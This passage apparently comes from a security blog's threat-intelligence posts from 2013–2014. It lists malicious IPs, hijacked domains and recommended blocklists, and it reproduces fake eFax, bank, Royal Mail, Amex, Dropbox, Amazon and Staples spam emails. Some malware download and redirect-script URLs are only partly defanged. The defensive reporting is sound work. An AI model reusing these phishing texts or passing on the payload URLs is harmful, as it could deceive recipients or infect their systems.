mangiamoneicantucci.com
mapclimber.com
matthewstarner.com
maxscenesdesign.com
mdmofgeorgia.com
memorialdaysavingsevent.com
mendezign.com
metoly.com
micksher.com
middlefieldma.net
midnightastronomy.com
mikemcmortgage.com
miracline.com
momsagainstmercury.com
monizarealty.com
mrsstyleseeker.com
mwhiteman.com
myabadi.com
mycameraleash.com
myfuturephysique.com
mystagingbox.com
my-ui.com
nacprint.com
newcarsat.com
newlogiq.com
newworldheroes.com
ngage-games.com
nitplus.com
nutritionbydesign.com
ny007ny.com
oharvest.net
omarker.net
omobia.com
onlybetterdeal.com
organixharvest.com
ozarkmountain4x4club.com
palermolundahl.com
pamsdogacademy.com
pamsdogtraining.com
panjiaying.com
panochevalleysolar.com
paulguardino.com
paxamericanaspirits.com
peekaboopumpkin.com
pennyappleapparel.com
pinkdollaratm.com
powerplaycreative.com
prestigehonda.net
propertiespain.com
qualitycomforthomeservices.com
realdealpsychic.com
registerforautoevent.com
reikisolar.com
remodelgreaterphoenix.com
renzograciemexico.com
restoremystuff.com
revolvertactical.net
richmondguitarx.com
rled.net
roaringlion.com
roaringlionenergydrink.com
savedalyfield.com
searchtrusted.com
secrettomb.com
sellitandforgetitnow.com
sellitandforgetittoday.com
shamrocksmokrz.com
shynlaw.com
signaturetoner.com
signaturetoners.com
skyviewphoto.com
slyforkfarm.com
snuffbottleworld.net
softmn.com
southvalleyrugby.com
specialpsychic.com
sportdoneright.com
springcleaningevent.com
squeezepagecentral.com
stainlessfabrications.com
stevesenergydrink.com
strongpsychic.com
studiosylverline.com
sunblockmaterials.com
tabeer-e-pakistan.com
tacomaliftkits.com
tagdeedlingua.com
tagdeed-translation.com
tagdeed-translations.com
techsupportauctions.com
teeboxpromo.com
telecomchicago.com
telecomillinois.com
telecomindiana.com
telecommichigan.com
tfgjustsayin.net
theafternoonjoker.com
theartdepot.net
thecinema6.com
thecollegeaddressshop.com
theeveningjoker.com
thehiddencorner.com
theknowledgekingdom.com
themorningjoker.com
thenightlyjoker.com
thinkadmit.com
thisishowthisworks.com
thisweekinwhiteness.com
thomasdesgrp.com
thomasdesigngroupllc.com
timkennywebdesign.com
timothykenny.com
timsicecreamtruck.com
timsroadtrip.com
toyotaliftkits.net
toyteclifts.net
trademarkrestoration.com
trademarkrestorationinc.com
tri-swelding.com
tropicaltoner.com
tuftsclimatejustice.com
turkrdns.com
twibularity.com
usdays.com
usedcarsat.com
usedmobi.com
valentinesalesevent.com
vehicleexchangeprogram.com
vehicleservicediscount.com
virtualsofts.com
warpets.com
webrunchhard.com
wenerdhard.com
whhholdingusainc.com
whhusainc.net
whichcameratookthis.com
whybuyanewhome.com
xn--80afcbdab0arg8e4c.com
xn--h1adlaje.net
yourcakedecoratingclass.com
yourcrystalball.com
yourspartanmovers.com
zombiesurvivalaptitudetest.com
zoomtoner.com
zoopoints.com
z-sat.com



Friday, 21 November 2014

Something evil on 46.8.14.154

46.8.14.154 (Netart Group S.r.o. / Movenix International Inc) forms part of an exploit chain that starts with compromised OpenX servers and appears to end up with an exploit kit of some sort.

The following subdomains have been active on that server, they are ALL hijacked GoDaddy domains:

band.animagraphic.net
casual.animagraphics.org
emissions.usanicotinebiz.com
family.animagraphics.com
format.animagraphics.net
george.animagraphics.net
hunger.usanicotinenow.com
indictment.animagraphic.net
interest.animagraphics.org
keeps.animagraphics.net
nearest.zeezoarticles.com
overwhelmingly.ecigvv.com
revolt.animagraphics.biz
south.animagraphics.com
tests.animagraphics.net
textile.animagraphics.org
this.animagraphics.net
transplant.madvapor.com
floatingtpoint.vzeliquid.com
delivering.animagraphics.biz
week.animagraphics.biz
speaks.animagraphics.biz
automobile.animagraphics.biz
herself.vvmod.com
obtained.vzmod.com
unixtbased.ecigvv.com
transplant.madvapor.com
metric.animagraphics.com
norway.animagraphics.com
plays.nicotinegiant.com
majority.usanicotinenow.com
underground.usanicotinenow.com
o.animagraphic.net
costs.animagraphic.net
illinois.animagraphic.net
rape.animagraphics.net
usable.animagraphics.net
presents.animagraphics.net
upper.hotzonenow.com

Domains spotted so far with malicious subdomains:

animagraphics.org
usanicotinebiz.com
animagraphics.com
animagraphics.net
usanicotinenow.com
zeezoarticles.com
ecigvv.com
animagraphics.biz
madvapor.com
vzeliquid.com
vvmod.com
vzmod.com
madvapor.com
nicotinegiant.com
hotzonenow.com

The best thing to do is to block traffic to 46.8.14.154 because these domains seem to change every few minutes.

Wednesday, 1 October 2014

Something evil on 87.118.127.230

Quite what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth blocking this IP. The source looks like some sort of malvertising, but I have incomplete data.

The domains I have seen being abused are:
aacregistry.org
agostjoe.com
apprizse.com
association-connect.com
barnesvillechiro.com
bwclinic.com
chiro-connect.com
ctkblockparty.org
holyhoops.net
josephrobidoux.com
lifeatctk.org
mca-connect.com
midwestartists.org
missouritheater.com
missouritheater.net
missouritheater.org
missouritheatre.com
missouritheatre.net
missouritheatre.org
moveonedegree.com
mvsummerhoops.com
premiermortgagenetwork.info
rapidpricecomparison.com
robidouxrow.com
smallbiz-connect.com
staffing-connect.com
stjoarts.org
stjoearts.com
trailswest.org
tumainiag.com
tumainiag.org
vpmspecialists.com

A list of all the subdomains I have seen can be found here [pastebin]

Thursday, 11 September 2014

eFax spam leads to Cryptowall

Yet another fake eFax spam. I mean really I cannot remember the last time someone sent me a fax. What's next? "Someone has sent you a telegram"?

From:     eFax [message@inbound.efax.com]
Date:     11 September 2014 20:35
Subject:     eFax message from "unknown" - 1 page(s), Caller-ID: 1-865-537-8935

Fax Message [Caller-ID: 1-865-537-8935
You have received a 1 page fax at Fri, 12 Sep 2014 02:35:44 +0700.

* The reference number for this fax is atl_did1-1400166434-52051792384-154.

Click here to view this fax using your PDF reader.

Please visit www.eFax.com/en/efax/twa/page/help if you have any questions regarding this message or your service.

Thank you for using the eFax service!

       

j2 Global | eFax | eVoice | FuseMail | Campaigner | KeepItSafe | OneBox

2014 j2 Global, Inc. All rights reserved.
eFax is a registered trademark of j2 Global, Inc.

This account is subject to the terms listed in the eFax Customer Agreement.
I bet you've already guessed that the link in the message goes somewhere bad, in this case it downloads a ZIP files from cybercity-game.com/game/Documents.zip which unzips to a malicious executable Documents.scr which has a pretty low VirusTotal detection rate of 2/55.

The ThreatTrack report clearly identifies this as Cryptowall and identifies that it either downloads data from or posts data to the following locations:

188.165.204.210/1109inst2/NODE01/0/51-SP3/0/
188.165.204.210/1109inst2/NODE01/1/0/0/
mtsvp.com/files/3/install2.tar
suspendedwar.com/87n3hdh5wi04gy
suspendedwar.com/ttfvku8z7jn
goodbookideas.com/wp-content/themes/twentyeleven/111.exe
suspendedwar.com/gwfqwaratrpl2c
suspendedwar.com/h0nxfsskh0xu
suspendedwar.com/kvlfhc0hjgo6sgo



The 111.exe has a much wider detection rate of 22/53 and according the the ThreatTrack analysis of that binary there is some sort of network connection to the following IPs:

193.169.86.151
193.19.184.20

Overall, the web hosts involved are:
46.151.145.11 (Swift Trace Ltd, Crimea)
50.63.85.76 (GoDaddy, US)
76.74.170.149 (Daiger Sydes Gustafson LLC / Peer 1, US)
188.165.204.210 (OVH, France)
193.19.184.20 (PE Intechservice-B, Ukraine)
193.169.86.151 (Ivanov Vitaliy Sergeevich, Ukraine)

I would recommend blocking the following:
188.165.204.210
193.19.184.20
193.169.86.151
goodbookideas.com
mtsvp.com
suspendedwar.com


Monday, 8 September 2014

RBS "Important Docs" spam doing the rounds again

The Royal Bank of Scotland has been spoofed several times recently, this latest fake spam contains a payload that looks like it might be Cryptowall.

Date:      Mon, 8 Sep 2014 15:00:22 +0100 [10:00:22 EDT]
From:      Vicente Mcneill [Vicente@rbs.co.uk]
Subject:      Important Docs

Please review attached documents regarding your account.

Tel:  01322 929655
Fax: 01322 499190
email: Vicente@rbs.co.uk

This information is classified as Confidential unless otherwise stated. 
Attached is an archive RBS_Account_Documents.zip containing a malicious executable RBS_Account_Documents.scr which has a detection rate at VirusTotal of 4/53. The ThreatTrack analysis [pdf] shows that it attempts to download components from the following locations:

95.141.37.158/0809uk1/NODE01/0/51-SP3/0/
95.141.37.158/0809uk1/NODE01/1/0/0/
95.141.37.158/0809uk1/NODE01/41/5/4/
bullethood.com/ProfilePics/0809uk1.zip

95.141.37.158 is SeFlow.it Internet Services, Italy. bullethood.com is on a shared server at GoDaddy. The malware also appears to be attempting to connect to 94.23.250.88 (OVH, France).

Recommended blocklist:
bullethood.com
95.141.37.158
94.23.250.88

Tuesday, 29 July 2014

Something evil on 31.210.96.155, 31.210.96.156, 31.210.96.157 and 31.210.96.158 (31.210.96.152/29)

[Note, an update to this can be found here]

I don't know quite what the exploit kit of the month is here, but the IP addresses 31.210.96.155, 31.210.96.156, 31.210.96.157 and 31.210.96.158 are currently serving up malware using hijacked GoDaddy domains, and are targeting victim websites by altering their .htaccess files to intercept traffic coming from search engines such as Google.

These IP addresses have been used for malware for some time and certainly historically they have been used for Ponmocup. I can't confirm that this is still the case, but given the bad IP and the obvious .htaccess hijack then it passed the Duck Test.

These IPs are allocated to Radore Veri Merkezi Hizmetleri A.S. in Turkey who control 31.210.64.0/18 which is a large block, so these IPs are probably a customer or even a customer of a customer.

VirusTotal reports for these IPs are pretty poor [1] [2] [3] [4]. I assume that they form part of an allocation 31.210.96.152/29 which I would very strongly recommend blocking that range, or indeed the entire /24 looks pretty worth

These domains all use the GoDaddy domaincontrol.com nameservers, which naturally means most of them are GoDaddy domains.. but not all of them, some are from other registrars. This list [pastebin] includes a selection of active subdomains that I can find.

I recommend permablocking the following IP range and temporarily blocking the following domains:

31.210.96.152/29
12stepdates.com
2cuonline.com
4runnerliftkits.com
8jutawan.com
advertisementdevil.com
allknowingpsychic.com
alloyfurnacerolls.com
alloymuffles.com
alloyradianttubes.com
allprodelta.com
alternateolympics.com
alternativeolympics.com
ancestorworshippublishing.com
antonzuponcic.com
aredietsok.com
assistlist.com
atvguidebooks.com
atvtrailguides.com
autoeventregistration.com
automotiveeventregistration.com
automotiveservicesavings.com
autoserviceevent.com
aylesburyironing.com
bahenasteel.com
barbeveragesla.com
basicmechanical.net
be3ne.com
be3ni.com
be3ny.com
benahavisrealestate.com
bestsilvercufflinks.com
blurlight.com
boeckman.net
bristolblog.com
buynewaz.com
bvvk.com
caninecolorgenetics.com
castlelawpa.com
charlesawells.com
chrisvessey.com
concept-kw.com
connectmetv.com
coreywasley.com
craigslistpads.com
cruzeonover.com
custom-chocolate-favors.com
customerdevil.com
dealerholidayevent.com
deliveredbythedevil.com
devilforacause.com
devilwithacause.com
djbobbyktoronto.com
drinkbluphoria.com
drinkcalories.net
dunstablekitchens.com
egunt.com
ellagphotography.com
encepha.net
enhancementlasers.com
enhancementlasers.net
e-squares.com
exceltoner.com
fantasyintro.com
fathersnsons.com
fatlosstoolkit.com
fortheloveofgadgets.com
gamezalot.com
gaybeefcake.com
gaybromance.com
gayconspiracy.com
gillspools.com
girlsgoneglamis.com
gliscastings.net
gliscentrifugal.com
glisfabrications.com
glisinc.com
golfironworks.com
golfnewsarkansas.com
golfnewscolorado.com
golfnewsconnecticut.com
golfnewsdelaware.com
golfnewsgeorgia.com
golfnewsindiana.com
golfnewsiowa.com
golfnewskansas.com
golfnewslouisiana.com
golfnewsmississippi.com
golfnewsmontana.com
golfnewsnebraska.com
golfnewsnewengland.com
golfnewsnewhampshire.com
golfnewsnewjersey.com
golfnewsnewyork.com
golfnewsohio.com
golfnewsoklahoma.com
golfnewssouthcarolina.com
golfnewstennessee.com
golfnewsutah.com
golfnewsvermont.com
golfnewswestvirginia.com
golfnewswisconsin.com
grafikcase.com
grafik-devils.com
gravittyproductions.com
greatserviceforless.com
gregorylknox.net
gryphonaz.com
gryphonus.com
gssportspics.com
hartford-capital.com
heattreatalloy.com
historyhobbybooks.com
hockeydoneright.com
hugesavingsevent.com
imfamousontheinternet.com
inboccaproductions.com
ingressgamer.com
inkandtonersale.com
italy-in-bocca.com
javaemulator.com
jaysonkrausenetwork.com
joannheilman.com
joeamericashow.com
joechenphoto.com
joeywilliamsdrums.com
jordandowney.com
jordandowney.net
juddnelsonstudio.com
kaitlinsplayground.com
killpoet.com
kokobon.com
ksupridewrestling.com
ksuwrestling.net
lakehousetimberranch.com
laser-enhancements.com
letseatinitaly.com
lifestylology.com
lindseytoothman.com
lionizetheworld.com
lions-mark.com
lsclinks.com
magicalmoods.com
makingwaves-salon.com
matthewstarner.com
memorialdaysavingsevent.com
menbeingsexy.com
middlefieldma.net
midnightastronomy.com
momsagainstmercury.com
mrsstyleseeker.com
musicjester.com
mwhiteman.com
myabadi.com
mycameraleash.com
myfuturephysique.com
mygaycrush.com
mystagingbox.com
myteacuppiggies.com
nacprint.com
newcarsat.com
newlogiq.com
newyorkjester.com
newyorkmascot.com
ngage-games.com
nutritionbydesign.com
oharvest.net
omobia.net
onlybetterdeal.com
organixharvest.com
panochevalleysolar.net
pascocountyhitmen.com
paxamericanaspirits.com
peekaboopumpkin.com
prestigehonda.net
propertiespain.com
realdealpsychic.com
reikisolar.com
renzograciemexico.com
restoremystuff.com
rled.net
roaringlion.com
room-depot.com
savedalyfield.com
schonbjj.com
sciencehunk.com
searchengineverified.com
secretmanclub.com
sellitandforgetittoday.com
snuffbottleworld.net
softmn.com
southvalleyrugby.com
sportdoneright.com
springcleaningevent.com
stainlessfabrications.com
strongpsychic.com
sullivan-county.com
tagdeed-translation.com
techsupportauction.com
telecomchicago.com
telecomillinois.com
telecomindiana.com
telecommichigan.com
thecinema6.com
thecollegeaddressshop.com
theeveningjoker.com
theknowledgekingdom.com
thenightlyjoker.com
thinkadmit.com
thisishowthisworks.com
thruellaseyes.com
timkennywebdesign.com
timsicecreamtruck.com
timsroadtrip.com
tri-swelding.com
uksportbook.com
usedcarsat.com
usedmobi.com
valentinesalesevent.com
vehicleexchangeprogram.com
vehicleservicediscount.com
vipoverload.com
virtualsofts.com
webrunchhard.com
wenerdhard.com
whhholdingusainc.com
whhusainc.net
whichcameratookthis.com
whybuyanewhome.com
workoutebook.com
worldblogsite.com
wrightdunbar.com
xn--80afcbdab0arg8e4c.com
xn--h1adlaje.net
yourcakedecoratingclass.com
yourcrystalball.com
yourspartanmovers.com
zoomtoner.com
zoopoints.com
z-sat.com

Note that the following domains have been cleaned up and are probably now safe.
apossibletruth.com
arrozconbeans.com
brads-test-site.com
casabodamia.com
catclinicgreensboro.com
charlestonremembered.com
chelseyfatula.com
creepyninja.com
ditchwindows.com
drdekloet.com
ebookleads.com
electhillary2016.com
evergentleonmymind.com
fasttwitterfollowers.com
foreverlivingon.com
gaycharacter.com
goldenpridewrestling.com
greensboroveterinarian.net
jcbsunglasses.com
jpcolton.com
kalkaneventfactory.com
newskase.com
pitstopmotorclub.com
registerforautoevent.com
remembercharleston.com
ridchinacne.com
saving53k.com
southernwakeautomotive.com
theneighborhoodaddressshop.com
ux-designer.com
williespage.com
windmuff.com

Thursday, 27 February 2014

"Royal Mail Shipping Advisory" spam

This fake Royal Mail spam has a malicious payload:

From:     Royal Mail noreply@royalmail.com
Date:     27 February 2014 14:50
Subject:     Royal Mail Shipping Advisory, Thu, 27 Feb 2014

Royal Mail Group Shipment Advisory

The following 1 piece(s) have been sent via Royal Mail on Thu, 27 Feb 2014 15:47:17 +0530, REF# GB36187692IE

For more details please follow the link below - http://www.royalmail.com/track-trace?=GB36187692IE   

SHIPMENT CONTENTS: Insurance Form

SHIPPER REFERENCE: Please refer to the Royal Mail Shipping Services

ADDITIONAL MESSAGE FROM SHIPPER: Please refer to the Royal Mail Shipping Services

Royal Mail Group Ltd 2014. All rights reserved

This is a ThreeScripts attack, the link in the email goes to:
[donotclick]wagesforinterns.com/concern/index.html 
and it then runs one or more of the following scripts:
[donotclick]billigast-el.nu/margarita/garlicky.js
[donotclick]ftp.arearealestate.com/telecasted/earners.js
[donotclick]tattitude.co.uk/combines/cartooning.js

in this case the payload site is at
[donotclick]northwesternfoods.com/sg3oyoe0v2
which is hosted on 23.239.12.68 (Linode, US) along with a bunch of hijacked GoDaddy sites (listed below in italics). The payload appears to be an Angler Exploit Kit (see this example).

Recommended blocklist:
23.239.12.68
billigast-el.nu
ftp.arearealestate.com
tattitude.co.uk
n2ocompanies.com
northerningredients.com
northwesternfoods.com
oziama.com
oziama.net

Tuesday, 3 December 2013

Another day, another fake eFax spam

These fake eFax spams are getting a bit dull. As you might expect, this one comes with a malicious attachment.

Date:      Tue, 3 Dec 2013 15:15:03 -0800 [18:15:03 EST]
From:      eFax Corporate [message@inbound.efax.com]
Subject:      Fax transmission: -5219616961-5460126761-20130705352854-84905.zip

Please find attached to this email a facsimile transmission we have just received on your behalf

(Do not reply to this email as any reply will not be read by a real person) 
Attached is a ZIP file which in this case is called -2322693863-6422657608-20130705409306-09249.zip (with a VirusTotal detection rate of 6/48) which in turn contains a malicious executable fax-report.exe which has an icon that makes it look like a PDF file and has a VirusTotal detection rate of 4/48.

Automated analysis tools [1] [2] [3] show an attempted communication with tuhostingprofesional.net on 188.121.51.69 (GoDaddy, Netherlands) which contains about 8 legitimate domains which may or may not have been compromised.

Tuesday, 26 November 2013

Something evil on 46.19.139.236

46.19.139.236 (Private Layer Inc, Switzerland) seems to be serving up some sort of Java exploit kit via injection attacks which is utilising hijacked legitimate domains, but the domains in use seem to rotate pretty quickly and I haven't got a copy of the payload, but VirusTotal has some examples. These are the domains that I can find running from this IP:

ihavefound.boostprep.com
greedka.byjohnwhitaker.com
green.byjohnwhitaker.com
calc.clermontjumps.com
createmore.clermontjumps.com
freesam.clermontjumps.com
team.clermontjumps.com
breast.ddghost.com
edit.ddghost.com
podkast.ddghost.com
fingerpro.golfrangefinderpro.com
goingup.golfrangefinderpro.com
hksnet.golfrangefinderpro.com
wolfram.golfrangefinderpro.com
bracers.harrismetals.net
cupholder.harrismetals.biz
marriage.harrismetals.biz
materials.harrismetals.biz
stockings.harrismetals.biz
resume.hemorrhoidhometreatmentremedy.com
automatic.herdprogram.com
changed.herdprogram.com
selection.herdprogram.com
variator.herdprogram.com
customers.houston-heights-realtor.com
employee.houston-heights-realtor.com
management.houston-heights-realtor.com
salesmanager.houston-heights-realtor.com
trunam.migweldersforsale.org
demonstration.modelagent.com
promotion.modelagent.com
resume.modelagent.com
servers.modelagent.com
grand.q-host.com
coaches.redbrickplayers.org
concrete.redbrickplayers.org
fiit.redbrickplayers.org
newone.redbrickplayers.org
teams.redbrickplayers.org
button.roadally.org
cars.roadally.org
forums.roadally.org
honest.shattertag.com
server.shattertag.com
service.shattertag.com
tagger.shattertag.com
enter.skillstuff.com
horners.skillstuff.com
sim4you.skillstuff.com
skill.skillstuff.com
urllink.skillstuff.com
servers.sleepets.com
somethingnew.sleepets.com
buddies.southlakehosting.com
goodie.southlakehosting.com
goodluck.southlakehosting.com
honest.southlakehosting.com
namefiest.sugarlandtxhouses.com
soft4you.sugarlandtxhouses.com
blogs.treatmentforeczemaguide.com
disconnected.treatmentforeczemaguide.com
italia.treatmentforeczemaguide.com
template.treatmentforeczemaguide.com
ball.wildbounce.com
savannah.wildbounce.com

These seem to be a mix of GoDaddy, 1&1 and eNom registered domains that have been hijacked. Ones listed in italics have been flagged as malicious by Google:
boostprep.com
byjohnwhitaker.com
clermontjumps.com
ddghost.com

golfrangefinderpro.com
harrismetals.net
harrismetals.biz
hemorrhoidhometreatmentremedy.com

herdprogram.com
houston-heights-realtor.com
migweldersforsale.org

modelagent.com
q-host.com

redbrickplayers.org
roadally.org
shattertag.com
skillstuff.com
sleepets.com
southlakehosting.com

sugarlandtxhouses.com
treatmentforeczemaguide.com
wildbounce.com

Monday, 28 October 2013

American Express "Fraud Alert" spam / steelhorsecomputers.net

This fake Amex spam leads to malware on steelhorsecomputers.net:

       
From:     American Express [fraud@aexp.com]
Date:     28 October 2013 14:14
Subject:     Fraud Alert : Irregular Card Activity


Irregular Card Activity
                   
               
Dear Customer,

We detected irregular card activity on your American Express

Check Card on 28th October, 2013.

As the Primary Contact, you must verify your account activity before you can
continue using your card, and upon verification, we will remove any restrictions
placed on your account.

To review your account as soon as possible please.

Please click on the link below to verify your information with us:

https://www.americanexpress.com/

If you account information is not updated within 24 hours then your ability
to access your account will be restricted.

We appreciate your prompt attention to this important matter.


© 2013 American Express Company. All rights reserved.        

AMEX Fraud Department


The link in the email goes through a legitimate but hacked site and then runs of of the following three scripts:
[donotclick]kaindustries.comcastbiz.net/imaginable/emulsion.js
[donotclick]naturesfinest.eu/eroding/patricians.js
[donotclick]winklersmagicwarehouse.com/handmade/analects.js

From there, the victim is sent to a malware landing page at [donotclick]steelhorsecomputers.net/americanexpress/ which is a hijacked GoDaddy domain hosted on 96.126.102.8 (Linode, US). There are other hijacked GoDaddy domains too, listed below in italics.

Recommended blocklist:
96.126.102.8
8353333.com
chrisfrillman.com
steelhorsecomputers.net
steelhorsecomputers.com

kaindustries.comcastbiz.net
naturesfinest.eu
winklersmagicwarehouse.com

           
                   
       

Friday, 4 October 2013

Fake Dropbox spam leads to malware on adelect.com

This fake Dropbox spam leads to malware:

Date:      Fri, 4 Oct 2013 16:24:30 +0330 [08:54:30 EDT]
From:      Dropbox [no-reply@dropboxmail.com]
Subject:      Please update your Expired Dropbox Password

Hi [redacted].

We noticed that you recently tried to login in to Dropbox with a password that you haven't changed more than 90 days. Your old password has expired and you'll need to create a new one to log in.

Please visit the page to update your password

Reset Password

Thanks!
- The Dropbox Team

The link in the email goes through a legitimate hacked site and then on to a set of three scripts:

[donotclick]12.158.190.75/molls/smudgier.js
[donotclick]freetraffic2yourweb.com/palermo/uneconomic.js
[donotclick]www.bathroomchoice.com/huntsmen/bestsellers.js

From there the victim is delivered to a malware landing page at [donotclick]adelect.com/topic/latest-blog-news.php which follows a predictable pattern of being a hijacked GoDaddy domain hosted on 66.150.155.210 (Nuclear Fallout Enterprises, US). There are some other hijacked domains on this same server listed below in italics.

Recommended blocklist:
66.150.155.210
wrightleasing.com
renewalbyandersendayton.com
adelect.com

12.158.190.75
freetraffic2yourweb.com
www.bathroomchoice.com

Thursday, 3 October 2013

Fake Amazon spam uses email address harvested from Comparethemarket.com

This fake Amazon spam was sent to an email address only used for the UK price comparison site Comparethemarket.com.

From:     Amazon.com [ship-confirm@amazon.com]
Reply-To:     "Amazon.com" [ship-confirm@amazon.com]
Date:     3 October 2013 15:43
Subject:     Your Amazon.com order of "Canon EOS 60D DSLR..." has shipped!

 Amazon.com        
Kindle Store
     |  Your Account  |  Amazon.com
Order Confirmation
Order #159-2060285-0376154
[redacted]

Thank you for shopping with us. We’d like to let you know that Amazon has received your order, and is preparing it for shipment. Your estimated delivery date is below. If you would like to view the status of your order or make any changes to it, please visit Your Orders on Amazon.com.

Your estimated delivery date is:
Thursday, Oct 3, 2013 -
Friday, Oct 4, 2013

Your shipping speed:
Next Day Air
Your Orders    

Your order was sent to:
Evan Young
1235 Sunset Dr
San Paolo, NE 69700-0290
United States
Order Details
Order #159-2060285-0376154
Placed on Wensday, May 29, 2013
    Canon EOS 60D DSLR 22.3 MP Full Frame CMOS with 1080p Full-HD Video Mode Digital SLR Camera (Body)
Electronics
In Stock
Sold by Electronic Express, Inc.
    Facebook     Twitter     Pinterest
    $1,397.99
Item Subtotal:     $1,397.99
Shipping & Handling:     $0.00

Total Before Tax:     $1,397.99
Estimated Tax:     $0.00

Order Total:     $1,397.99

To learn more about ordering, go to Ordering from Amazon.com.
If you want more information or need more assistance, go to Help.

Thank you for shopping with us.
Amazon.com
DVD
   
Books

Unless otherwise noted, items are sold by Amazon.com LLC and taxed if shipped to Kansas, North Dakota, New York, Kentucky or Washington. If your order contains one or more items from an Amazon.com partner it may be subject to state and local sales tax, depending on the state to which the item is being shipped. Learn more about tax and seller information.

This email was sent from a notification-only address that cannot accept incoming email. Please do not reply to this message. 

How the email address was extracted from Comparethemarket.com is not known.

The link in the email goes through a legitimate hacked site and then runs one of the following three scripts:

[donotclick]berkahabadi.de/unclear/unsettle.js
[donotclick]sigmarho.zxq.net/ragas/sextant.js
[donotclick]wni9e7311.homepage.t-online.de/creel/eccentrically.js


This redirects the victim to a malware page at [donotclick]globalrealty-nyc.info/topic/latest-blog-news.php which is a hijacked GoDaddy domain hosted on 96.126.103.252 (Linode, US). THis is currently the only domain that I can detect on this computer, but the usual pattern is that there will be several others so blocking that IP address would be prudent.

Recommended blocklist:
96.126.103.252
globalrealty-nyc.info
berkahabadi.de
sigmarho.zxq.net
wni9e7311.homepage.t-online.de

Wednesday, 2 October 2013

Fake Staples spam leads to malware on tootle.us

This fake Staples spam leads to malware on a site called tootle.us:

Date:      Wed, 2 Oct 2013 08:40:11 -0500 [09:40:11 EDT]
From:      support@orders.staples.com
Subject:      Staples order #: 1353083565
           

Thank you for shopping Staples.
Here's what happens next:
Order No.:1353083565
   
Customer No.:1278823232     Method of Payment:Credit or Debit Card
Track order: Track your order
Delivery Address:
Caleb Lewis
41 COMMERCE ST
GREENFIELD WA 092980135    
           
    Item1     Qty.     Subtotal
    DELL 1320 BLACK TONER
Item No.:744319Price:$60.38/each
Expected delivery:10/4/2013byUPS     2     $125.26
    Item2     Qty.     Subtotal
    DELL RY854 CYAN TONER
Item No.:717860Price:$61.87/each
Expected delivery:10/4/2013byUPS     2     $124.03
       
Subtotal::     $243.59    
Delivery:     FREE    
Tax:     $17.66    
Total:     $250.35    

    Your order is subject to review and the expected delivery date(s) noted above are pending credit or check approval.
    Won't be there to sign for your order from 9 am to 5 pm, Monday - Friday. Print ourDriver Release. Some residential orders may be delivered by UPS as late as 7 pm.
    Questions about your order? Call us at 1-800-3STAPLE (1-800-378-2753) or email us atsupport@orders.staples.com. You can also fax us at 1-800-333-3199.
    See our return policy.
    Our prices vary from store prices. Not responsible for typographical errors. Not all items are available. We reserve the right to limit quantities, including the right to prohibit sales to resellers.
    Thanks for shopping Staples.

[snip]
The link in the email goes to a legimate (but hacked site) and then attempt to load one of the following three scripts:
[donotclick]algmediation.org/inventory/symphony.js
[donotclick]apptechgroups.net/katharine/bluejacket.js
[donotclick]ctwebdesignshop.com/marquetry/bucket.js


From there the victim is redirected to a malware landing page at [donotclick]tootle.us/topic/latest-blog-news.php hosted on 23.92.22.75 (Linode, US) which is yet another hijacked GoDaddy domain (there are some more on this server, listed below in italics).


Recommended blocklist:
23.92.22.75
tootle.us
tungstenrents.com
tweetbyte.com

algmediation.org
apptechgroups.net
ctwebdesignshop.com